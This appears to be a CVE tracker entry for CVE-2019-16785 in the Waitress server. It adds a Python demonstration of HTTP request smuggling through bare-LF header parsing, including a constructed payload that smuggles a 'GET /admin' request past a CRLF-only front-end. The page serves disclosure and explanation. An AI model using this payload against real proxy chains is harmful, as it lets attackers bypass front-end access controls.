CVE-2019-16785

Priority
Description
Waitress through version 1.3.1 implemented a "MAY" clause of RFC 7230,
which states: "Although the line terminator for the start-line and header
fields is the sequence CRLF, a recipient MAY recognize a single LF as a
line terminator and ignore any preceding CR." If a front-end server (a
reverse proxy or load balancer) does not parse header fields containing a
bare LF the same way it parses those terminated by CRLF, the front-end and
the back-end parse the same HTTP message in two different ways. That
discrepancy is the precondition for HTTP request smuggling/splitting:
Waitress may see two requests where the front-end server saw a single HTTP
message, so the second request is never inspected by the front-end. This
issue is fixed in Waitress 1.4.0.
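The following is an added example, not Waitress's own parser or any code from the project, that models the two parsers the description contrasts and runs them over a constructed payload. The front-end model treats only CRLF as a line terminator and keeps a bare LF as an ordinary byte inside the header value; the back-end model applies the RFC 7230 "MAY" and splits on the bare LF. Hiding a Transfer-Encoding header behind a bare LF therefore lets only the back-end see it, so the back-end frames the body as chunked while the front-end trusts Content-Length. The choice that the back-end prefers chunked framing over Content-Length, the header names, host and paths are assumptions of the model, not statements about Waitress or any particular proxy.

```python
"""Constructed demonstration of the CRLF/LF header-terminator mismatch
described in CVE-2019-16785. Example code, not Waitress's parser."""
import re

# Header-block terminators for the two parser models.
_CRLF_ONLY_END = re.compile(rb"\r\n\r\n")
_BARE_LF_END = re.compile(rb"\r?\n\r?\n")


def _read_chunked(data: bytes, pos: int):
    """Consume a chunked body starting at `pos`; return (body, new_pos)."""
    body = b""
    while True:
        end = data.index(b"\r\n", pos)
        size = int(data[pos:end].split(b";")[0], 16)
        pos = end + 2
        if size == 0:
            # last-chunk, followed by an (empty) trailer and a final CRLF
            if data[pos:pos + 2] != b"\r\n":
                raise ValueError("missing CRLF after last chunk")
            return body, pos + 2
        body += data[pos:pos + size]
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ValueError("missing CRLF after chunk data")
        pos += 2


def parse_requests(data: bytes, accept_bare_lf: bool):
    """Split `data` into consecutive HTTP/1.1 requests.

    accept_bare_lf=False models a front-end that treats only CRLF as a
    line terminator; a bare LF is just a byte inside a header value.
    accept_bare_lf=True models the RFC 7230 "MAY": a lone LF ends the
    line and a preceding CR is ignored (what Waitress <= 1.3.1 did).
    Returns a list of (request_line, headers, body); headers is a list of
    (lower-cased name, value) pairs.
    """
    requests = []
    pos = 0
    while pos < len(data):
        end_re = _BARE_LF_END if accept_bare_lf else _CRLF_ONLY_END
        m = end_re.search(data, pos)
        if m is None:
            raise ValueError("incomplete header block")
        head, pos = data[pos:m.start()], m.end()
        if accept_bare_lf:
            lines = [ln.rstrip(b"\r") for ln in head.split(b"\n")]
        else:
            lines = head.split(b"\r\n")
        request_line, headers = lines[0], []
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers.append((name.strip().lower(), value.strip()))
        hdrs = dict(headers)
        # Body framing (model assumption): chunked takes precedence over
        # Content-Length, as RFC 7230 section 3.3.3 prescribes.
        if hdrs.get(b"transfer-encoding", b"").lower() == b"chunked":
            body, pos = _read_chunked(data, pos)
        else:
            length = int(hdrs.get(b"content-length", b"0"))
            body = data[pos:pos + length]
            if len(body) != length:
                raise ValueError("short body")
            pos += length
        requests.append((request_line, headers, body))
    return requests


# Constructed attacker payload (hypothetical host and paths): the
# Transfer-Encoding header is hidden behind a bare LF inside the X-Ignore
# header, so only a bare-LF parser sees it. Content-Length covers the
# whole remainder, so a CRLF-only parser reads the second request as body.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: backend\r\n\r\n"
FIRST_BODY = b"0\r\n\r\n" + SMUGGLED   # empty chunked body, then request 2
PAYLOAD = (
    b"POST / HTTP/1.1\r\n"
    b"Host: backend\r\n"
    b"X-Ignore: 1\nTransfer-Encoding: chunked\r\n"
    b"Content-Length: " + str(len(FIRST_BODY)).encode() + b"\r\n"
    b"\r\n" + FIRST_BODY
)


def request_lines(data: bytes, accept_bare_lf: bool):
    """Request lines each parser model extracts from `data`."""
    return [req[0] for req in parse_requests(data, accept_bare_lf)]


if __name__ == "__main__":
    print("front-end (CRLF only):", request_lines(PAYLOAD, False))
    print("back-end  (bare LF):  ", request_lines(PAYLOAD, True))
```

The CRLF-only model returns a single POST with a 43-byte body; the bare-LF model returns that POST with an empty chunked body followed by a second GET /admin that the front-end never saw as a request. Any fix has to remove the discrepancy rather than paper over it on one side: either both hops accept bare LF identically, or, the safer posture, a header line containing a bare LF is rejected outright instead of being interpreted.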
Notes
Package
Upstream: released (1.4.0)
Ubuntu 18.04 LTS: needed
Ubuntu 20.04 LTS: not-affected (1.4.1-1)
Ubuntu 21.10: not-affected (1.4.1-1)
Ubuntu 16.04 ESM: needed
Ubuntu 22.04 LTS: not-affected (1.4.1-1)
Ubuntu 14.04 ESM: DNE
Patches:
Upstream:https://github.com/Pylons/waitress/commit/8eba394ad75deaf9e5cd15b78a3d16b12e6b0eba
More Information

Updated: 2022-04-25 00:37:47 UTC (commit ecc1009cb19540b950de59270950018900f37f15)